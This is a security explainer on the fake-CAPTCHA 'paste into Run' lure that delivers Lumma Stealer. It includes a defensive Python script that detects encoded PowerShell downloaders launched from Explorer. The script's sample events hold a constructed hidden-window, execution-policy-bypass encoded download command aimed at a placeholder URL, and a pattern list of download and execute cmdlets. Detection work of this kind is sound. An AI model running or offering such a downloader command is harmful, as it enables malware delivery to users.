Threat actors create phishing sites hosted on various providers, often utilising content delivery networks. When a user visits one of these fake verification pages, it presents a fake Google CAPTCHA. Upon clicking the “Verify” button, users are tricked into following these unusual instructions:

Open the Run dialogue (Win+R).

Press Ctrl+V to paste copied content.

Press Enter.

Unknown to the user, clicking “Verify” has already run a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard; pasting it into the Run dialogue and pressing Enter executes it. The PowerShell command, when executed, downloads the Lumma Stealer malware from a remote server, compromising the victim’s system. The downloaded malware then establishes connections with attacker-controlled domains, posing a risk to users and their data.
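The chain described above leaves a distinctive trace in endpoint telemetry: powershell.exe spawned by explorer.exe (the Run dialogue is part of the shell), carrying an -EncodedCommand payload that, once decoded, fetches remote content. The detection below is an added example written for this page; it is not code from the article or from CloudSEK. The event field names (parent, image, cmdline), the sample events and the placeholder URL are all constructed for the example, and the download-cue list is an assumption about what such a payload typically contains rather than anything quoted from the article.

```python
"""Flag PowerShell launched from the Run dialogue with an encoded downloader payload."""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...),
# so match every prefix instead of only the full switch name.
_ENC_ALTS = "|".join(re.escape("encodedcommand"[:i]) for i in range(1, len("encodedcommand") + 1))
ENC_SWITCH = re.compile(rf"(?i)(?:^|\s)[-/](?:{_ENC_ALTS})\s+([A-Za-z0-9+/=]+)")

# Cmdlets / .NET calls that fetch or run remote content (assumed cue list, not from the article).
DOWNLOAD_CUES = re.compile(
    r"(?i)\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer|"
    r"invoke-expression|iex)\b"
)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # powershell.exe expects UTF-16LE inside the base64
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(event: dict):
    """Return a finding for one process-creation event, or None if it is not suspicious."""
    image = event["image"].lower()
    parent = event["parent"].lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    reasons = []
    # Commands typed into Win+R are started by the shell, so the parent is explorer.exe
    # rather than a terminal, script host or management agent.
    if parent.endswith("explorer.exe"):
        reasons.append("launched from Explorer (Run dialogue / shell)")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is None:
        return None
    reasons.append("uses -EncodedCommand")
    cues = sorted({c.lower() for c in DOWNLOAD_CUES.findall(decoded)})
    if cues:
        reasons.append("decoded payload fetches/executes remote content: " + ", ".join(cues))
    # Alert only on the full combination: shell parent + encoded command + download cue.
    if len(reasons) < 3:
        return None
    return {"cmdline": event["cmdline"], "decoded": decoded, "reasons": reasons}


def scan(events):
    """Run analyze() over a list of parsed process-creation events."""
    return [f for f in (analyze(e) for e in events) if f]


def _enc(ps: str) -> str:
    """Encode a PowerShell string the way -EncodedCommand expects (UTF-16LE, then base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed sample events (not real telemetry). Fields mirror what a parsed Sysmon
# Event ID 1 or Windows 4688 record provides; the URL is a deliberate placeholder.
SAMPLE_EVENTS = [
    {   # the pattern from the article: shell parent, hidden window, encoded downloader
        "parent": EXPLORER, "image": PS,
        "cmdline": "powershell -w hidden -ep bypass -enc "
                   + _enc("Invoke-WebRequest http://example.invalid/placeholder -OutFile $env:TEMP\\p.bin"),
    },
    {   # benign: encoded and launched from Explorer, but no network activity
        "parent": EXPLORER, "image": PS,
        "cmdline": "powershell -enc " + _enc("Get-Date | Out-File $env:TEMP\\t.txt"),
    },
    {   # benign: a script run from cmd.exe, not the Run dialogue and not encoded
        "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
        "cmdline": "powershell -File C:\\scripts\\fetch-updates.ps1",
    },
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print("ALERT:", "; ".join(f["reasons"]))
        print("   decoded:", f["decoded"])
```

Only the first sample event is flagged: the second is encoded but does nothing network-related, and the third has neither the shell parent nor an encoded command. Decoding the payload before matching matters because the base64 layer hides the cmdlet names from plain command-line string matching. Text typed into the Run dialogue is also persisted in the per-user RunMRU registry key, which gives a corroborating artifact during triage.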

“This new tactic is particularly dangerous because it plays on users' trust in widely recognised CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems,” said Anshuman Das, security researcher at CloudSEK.